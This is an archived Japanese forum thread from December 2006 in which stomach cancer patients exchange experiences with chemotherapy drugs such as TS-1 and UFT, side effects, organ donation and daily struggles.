   \        /

91 :病弱名無しさん:2006/12/23(土) 15:51:58 ID:O19+IQEw
最近の胃癌化学療法の話題;早期発見早期手術は言うまでもない。根治度が高い手術でも
TS-1をすすめられる事が多い。再発してきたら別な抗癌剤に変更(セカンドライン)。効果が
得られなければ更にサードラインに変更・・・・。リレーでバトンを繋ぐがごとくきれずに
化学療法を継続していく。タキサンだのシスプラだのカンプトだの効果が期待できる薬が
いろいろあるから。有効な新しいレジメンが出てくると。以上某製薬メーカーMRの話。

92 :病弱名無しさん:2006/12/23(土) 16:54:12 ID:ek4/ow0f
今日パチンコでたったの1300円の儲け…
んで帰りに漫画+飯代に使って無くなった
つーか合計すると-360円だわ

93 :病弱名無しさん:2006/12/23(土) 21:50:16 ID:CAS5pjeq
早期じゃなければよかった。末期で死ねばよかった。手術するんじゃなかった。

94 :病弱名無しさん:2006/12/23(土) 23:13:16 ID:O19+IQEw
臓器提供カードを持っていることを思い出した。万が一脳死になったら臓器を摘出して
移植に使ってくださいって奴だ。確かすべての臓器にサインしたはずだ。でも癌患者でしかも
抗癌剤治療をしている香具師の臓器は使ってくれないだろうな。術後5年経てば使えるかな?

95 :病弱名無しさん:2006/12/24(日) 00:48:00 ID:Bk15Yl61
ドナーカードは常に所持携帯してないと認められない。
それに遺族の同意が全員得られないと実行すらされない。
でもこの前ニュースで癌患者の腎臓が勝手に移植されてたな。

96 :病弱名無しさん:2006/12/24(日) 11:07:33 ID:NUeCQ7uw
免許証の後に入れてあるよ。今見たらしっかり家族(女房)の署名もしてあった。あのころは
バイクに乗っていた。また乗りてーナ。メットはまだ処分していない。

97 :病弱名無しさん:2006/12/24(日) 13:03:12 ID:eodTk8ki
>>94
「癌々行こうぜ」ってHPにがん患者の臓器提供や献血、
保険のことなんか書いてあるよん。

98 :前スレ6:2006/12/24(日) 17:46:53 ID:zUcmfZwG
>>11さん、いや、みやさん
御元気そうで!ぽいぽいさんや、るなさんも!あみさん退院オメデトウございます!
3さんは元気かな〜!
私も何とか増えた体重が離婚のストレスでまた術後くらいまで減ってしまいまして。
ちょっと不安なこのごろです。精神的には安定してはきてますが。
UFTはまだ飲まなきゃならないのかしら…。薬代が嵩んでしんどいっす。

99 :病弱名無しさん:2006/12/24(日) 18:02:39 ID:NUeCQ7uw
UFTのジェネリックあるよん。TS-1はないけど。

100 :病弱名無しさん:2006/12/25(月) 00:05:03 ID:rgMvVWDf
UFTを使うならTS1にする。

101 :病弱名無しさん:2006/12/25(月) 14:19:18 ID:mc4zEh9T
ピシクレ(ピシバニール、クレスチン)やってる方いまっか?主治医に相談したら
思いっきりあきれていました。

102 :病弱名無しさん:2006/12/25(月) 22:29:55 ID:Yiz8F9FM
レンチナン拒否された

103 :病弱名無しさん:2006/12/26(火) 00:21:34 ID:51PihwxI
呆れていた?再発転移してないのに希望したとか?

104 :病弱名無しさん:2006/12/26(火) 13:40:40 ID:DEwxk1rP
68です。サンドスタチンのなま情報きぼん。新しい薬に期待しよう。

105 :病弱名無しさん:2006/12/26(火) 13:51:48 ID:FvrKNZEV
王監督の胃全摘出術ってどんな方法でやったんんだろうか?
食道と十二指腸を繋いでるのか、空腸を繋いでるのか。。
わかる方よろしく

106 :病弱名無しさん:2006/12/27(水) 00:23:23 ID:RtAEKHZT
サンドスタチンって胃癌に効果あるんですか?

107 :病弱名無しさん:2006/12/27(水) 02:23:06 ID:fp4+pR63
TS1の副作用が辛くて服用中止する方ってけっこういますか?
主に感じる副作用は倦怠感、食欲減退(味覚障害、臭いのキツさにムッとくるなど妊婦のつわりのような症状)、
皮膚の色素沈着です。

108 :病弱名無しさん:2006/12/27(水) 10:50:28 ID:rMHVZFnH
進行再発癌の消化管閉塞症状(腹痛、嘔気、嘔吐)に有効とのこと。治療をめざした抗腫瘍治療への
コンプライアンス向上が期待できると。食事が摂れる様になったり薬も飲めるようになるらしい。


35 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)